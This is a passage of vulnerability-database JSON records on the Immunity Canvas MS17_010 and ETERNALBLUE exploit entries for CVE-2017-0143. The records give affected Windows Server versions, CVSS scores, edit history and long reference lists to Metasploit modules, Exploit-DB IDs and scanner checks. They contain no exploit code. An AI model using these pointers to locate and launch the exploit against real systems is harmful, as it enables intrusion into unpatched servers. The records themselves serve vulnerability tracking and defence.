\n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-05-29T19:48:22", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:48:22", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "bc2484f98d1a050cf25b2d562ec2eb2c25a124099d659cdc2844cff9c439e33e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "modified"}, {"hash": "206c88939ab5a83df743f16043cf2bfb", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "886297e4ad999f269e3a85b85f7bbdd0", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "14b43373035e95c34886272d7dc25baa", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "8e708b071b800ae1142b16ab81c46b63", "key": "title"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "id": "MS17_010", "immutableFields": [], "lastseen": "2019-05-29T19:48:22", "modified": "2017-03-17T00:59:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: MS17_010", "type": "canvas", "viewCount": 530}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2019-05-29T19:48:22"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "206c88939ab5a83df743f16043cf2bfb"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "886297e4ad999f269e3a85b85f7bbdd0"}, {"key": "href", "hash": "14b43373035e95c34886272d7dc25baa"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "403ed403becfd91e34c7d282e2a3b12f"}, {"key": "title", "hash": "8e708b071b800ae1142b16ab81c46b63"}, {"key": "type", "hash": "fcc790c72a86190de1b549d0ddc6f55c"}], "hash": "9870de6c1bcbf43de9bc18d7ba9de95ceb10b97dac37cbc1e3c9d67d7145221c", "viewCount": 534, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2021-07-28T14:33:36", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-07-28T14:33:36", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}, {"id": "ETERNALBLUE", "bulletinFamily": "exploit", "title": "Immunity Canvas: ETERNALBLUE", "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. \nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "published": "2017-03-17T00:59:00", "modified": "2017-03-17T00:59:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "reporter": "Immunity Canvas", "references": [], "cvelist": ["CVE-2017-0143"], "type": "canvas", "lastseen": "2021-07-28T14:33:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. \nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T19:48:21", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:48:21", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "552ae87accf32feabdbe0d80cf84b21bc0069a8bb27144e006e5428b1f45b216", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}, {"hash": "5c497684e7b982e9f41e89081d72ea17", "key": "description"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "immutableFields": [], "lastseen": "2019-05-29T19:48:21", "modified": "2017-03-17T00:59:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 991}, "different_elements": ["cvss3", "cvss2"], "edition": 3, "lastseen": "2019-05-29T19:48:21"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. \nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "b0e90c3122f73836223b10ea3ff9ec2bc689ed0b4b16f8d9fb819566bde3d3ab", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "0e9da813b8998d01d6d214be3da05aa6", "key": "description"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "lastseen": "2018-02-28T23:28:19", "modified": "2017-03-16T20:59:03", "objectVersion": "1.3", "published": "2017-03-16T20:59:03", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 315}, "differentElements": ["description"], "edition": 1, "lastseen": "2018-02-28T23:28:19"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ETERNALBLUE \n---|--- \n**CVE**| CVE-2017-0143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ETERNALBLUE \n**Notes**| CVE Name: CVE-2017-0143 \nVENDOR: Microsoft \nNOTES: Due to the complexity of the bug, this exploit will never be 100% reliable. Please READ THE EXPLOIT SOURCE for more information and notes. \nVersionsAffected: \nRepeatability: One shot (on failure BSoD might be followed by a reboot, giving opportunity to try again) \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2018-11-01T14:03:35", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "4401033752458d8a3fa014fc0e369a264b1a5af006cd629595ef0dd9653da4e8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "c32f9a5d9de00e1a1587ad7b40285fd0", "key": "href"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}, {"hash": "f2261f338fd984f44c0d57addcdd12eb", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "23ade5ff03698910f687eabbc702a4a8", "key": "title"}, {"hash": "5c497684e7b982e9f41e89081d72ea17", "key": "description"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ETERNALBLUE", "id": "ETERNALBLUE", "lastseen": "2018-11-01T14:03:35", "modified": "2017-03-16T20:59:03", "objectVersion": "1.3", "published": "2017-03-16T20:59:03", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: ETERNALBLUE", "type": "canvas", "viewCount": 810}, "differentElements": ["cvss", "published", "modified"], "edition": 2, "lastseen": "2018-11-01T14:03:35"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": 